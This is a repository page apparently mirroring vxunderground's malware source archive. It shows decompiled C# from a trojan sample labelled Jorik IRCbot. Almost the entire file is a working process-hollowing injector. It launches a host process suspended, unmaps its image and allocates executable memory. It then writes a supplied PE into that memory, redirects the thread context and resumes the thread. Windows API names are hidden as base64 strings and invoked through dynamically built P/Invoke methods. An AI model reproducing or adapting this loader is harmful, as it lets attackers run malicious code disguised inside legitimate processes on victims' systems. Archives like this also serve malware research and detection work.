ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-21 10:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/J/Trojan.Win32.Jorik.IRCbot.cwp-92f7e121edf5bcaced863d99561f0db912de86a6c07c307f3e429d5ad8e8f881/uqeyrwlquci0gyeo0qjxqcszc.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

161 lines
7.9 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: uqeyrwlquci0gyeo0qjxqcszc
// Assembly: 4ldbvrmz, Version=6.0.220.4, Culture=neutral, PublicKeyToken=null
// MVID: 7CE81D78-4EC2-4D47-AD6D-9A598C5B77D4
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.cwp-92f7e121edf5bcaced863d99561f0db912de86a6c07c307f3e429d5ad8e8f881.exe
using System;
using System.Reflection;
using System.Reflection.Emit;
using System.Runtime.InteropServices;
public static class uqeyrwlquci0gyeo0qjxqcszc
{
private const uint CONTEXT_FULL = 65543;
private const int CREATE_SUSPENDED = 4;
private const int MEM_COMMIT = 4096;
private const int MEM_RESERVE = 8192;
private const int PAGE_EXECUTE_READWRITE = 64;
private const ushort IMAGE_DOS_SIGNATURE = 23117;
private const uint IMAGE_NT_SIGNATURE = 17744;
public static unsafe bool Vbm2knor525p1x3t5q2zsdbhh(
byte[] exeBuffer,
string hostProcess,
string optionalArguments)
{
byte[] dst1 = new byte[40];
byte[] dst2 = new byte[248];
byte[] dst3 = new byte[64];
int[] numArray1 = new int[4];
byte[] numArray2 = new byte[716];
fixed (byte* numPtr = &dst1[0])
;
fixed (byte* numPtr = &dst2[0])
;
fixed (byte* numPtr = &dst3[0])
;
fixed (byte* numPtr = &numArray2[0])
;
// ISSUE: fixed variable is out of scope
*(int*) numPtr = 65543;
Buffer.BlockCopy((Array) exeBuffer, 0, (Array) dst3, 0, dst3.Length);
// ISSUE: fixed variable is out of scope
if (*(ushort*) numPtr != (ushort) 23117)
return false;
// ISSUE: fixed variable is out of scope
int srcOffset = *(int*) (numPtr + 60);
Buffer.BlockCopy((Array) exeBuffer, srcOffset, (Array) dst2, 0, dst2.Length);
// ISSUE: fixed variable is out of scope
if (*(uint*) numPtr != 17744U)
return false;
string str = ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("");
if (!string.IsNullOrEmpty(optionalArguments))
str = hostProcess + " " + optionalArguments;
if (!uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<bool>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("Q3JlYXRlUHJvY2Vzcw=="), new Type[10]
{
typeof (string),
typeof (string),
typeof (IntPtr),
typeof (IntPtr),
typeof (bool),
typeof (int),
typeof (IntPtr),
typeof (string),
typeof (byte[]),
typeof (int[])
}, (object) hostProcess, (object) str, (object) IntPtr.Zero, (object) IntPtr.Zero, (object) false, (object) 4, (object) IntPtr.Zero, null, (object) new byte[68], (object) numArray1))
return false;
// ISSUE: fixed variable is out of scope
IntPtr num1 = new IntPtr(*(int*) (numPtr + 52));
int num2 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRVbm1hcFZpZXdPZlNlY3Rpb24="), new Type[2]
{
typeof (IntPtr),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[0], (object) num1);
// ISSUE: fixed variable is out of scope
if (uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<IntPtr>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("a2VybmVsMzI="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("VmlydHVhbEFsbG9jRXg="), new Type[5]
{
typeof (IntPtr),
typeof (IntPtr),
typeof (uint),
typeof (int),
typeof (int)
}, (object) (IntPtr) numArray1[0], (object) num1, (object) *(uint*) (numPtr + 80), (object) 12288, (object) 64) == IntPtr.Zero)
uqeyrwlquci0gyeo0qjxqcszc.Vbm2knor525p1x3t5q2zsdbhh(exeBuffer, hostProcess, optionalArguments);
fixed (byte* numPtr = &exeBuffer[0])
{
// ISSUE: fixed variable is out of scope
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
{
typeof (IntPtr),
typeof (IntPtr),
typeof (IntPtr),
typeof (uint),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[0], (object) num1, (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 84), (object) IntPtr.Zero);
}
// ISSUE: fixed variable is out of scope
for (ushort index = 0; (int) index < (int) *(ushort*) (numPtr + 6); ++index)
{
Buffer.BlockCopy((Array) exeBuffer, srcOffset + dst2.Length + dst1.Length * (int) index, (Array) dst1, 0, dst1.Length);
// ISSUE: fixed variable is out of scope
fixed (byte* numPtr = &exeBuffer[(IntPtr) *(uint*) (numPtr + 20)])
{
// ISSUE: fixed variable is out of scope
// ISSUE: fixed variable is out of scope
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
{
typeof (IntPtr),
typeof (IntPtr),
typeof (IntPtr),
typeof (uint),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[0], (object) (IntPtr) ((long) (int) num1 + (long) *(uint*) (numPtr + 12)), (object) (IntPtr) (void*) numPtr, (object) *(uint*) (numPtr + 16), (object) IntPtr.Zero);
}
}
// ISSUE: fixed variable is out of scope
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRHZXRDb250ZXh0VGhyZWFk"), new Type[2]
{
typeof (IntPtr),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr);
// ISSUE: fixed variable is out of scope
uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<int>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRXcml0ZVZpcnR1YWxNZW1vcnk="), new Type[5]
{
typeof (IntPtr),
typeof (IntPtr),
typeof (IntPtr),
typeof (int),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[0], (object) (IntPtr) (long) *(uint*) (numPtr + 172), (object) num1, (object) 4, (object) IntPtr.Zero);
// ISSUE: fixed variable is out of scope
// ISSUE: fixed variable is out of scope
*(int*) (numPtr + 176) = (int) num1 + (int) *(uint*) (numPtr + 40);
// ISSUE: fixed variable is out of scope
int num3 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRTZXRDb250ZXh0VGhyZWFk"), new Type[2]
{
typeof (IntPtr),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[1], (object) (IntPtr) (void*) numPtr);
int num4 = (int) uqeyrwlquci0gyeo0qjxqcszc.Ym0011n1sqree12pbi2kviopbv04c0hwt<uint>(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bnRkbGw="), ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("TnRSZXN1bWVUaHJlYWQ="), new Type[2]
{
typeof (IntPtr),
typeof (IntPtr)
}, (object) (IntPtr) numArray1[1], (object) IntPtr.Zero);
return true;
}
public static TR Ym0011n1sqree12pbi2kviopbv04c0hwt<TR>(
string name,
string method,
Type[] typeArr,
params object[] arguments)
{
ModuleBuilder moduleBuilder = AppDomain.CurrentDomain.DefineDynamicAssembly(new AssemblyName("temp"), AssemblyBuilderAccess.Run).DefineDynamicModule(ybneke5hgomifymim4zvimnpa.Q2kqkb3gwlztiqkx035mgfo3r("bW9kdWxl"));
moduleBuilder.DefinePInvokeMethod(method, name, MethodAttributes.Public | MethodAttributes.Static | MethodAttributes.PinvokeImpl, CallingConventions.Standard, typeof (TR), typeArr, CallingConvention.Winapi, CharSet.Ansi).SetImplementationFlags(MethodImplAttributes.PreserveSig);
moduleBuilder.CreateGlobalFunctions();
return (TR) moduleBuilder.GetMethod(method).Invoke((object) null, arguments);
}
}
Reference in New Issue View Git Blame Copy Permalink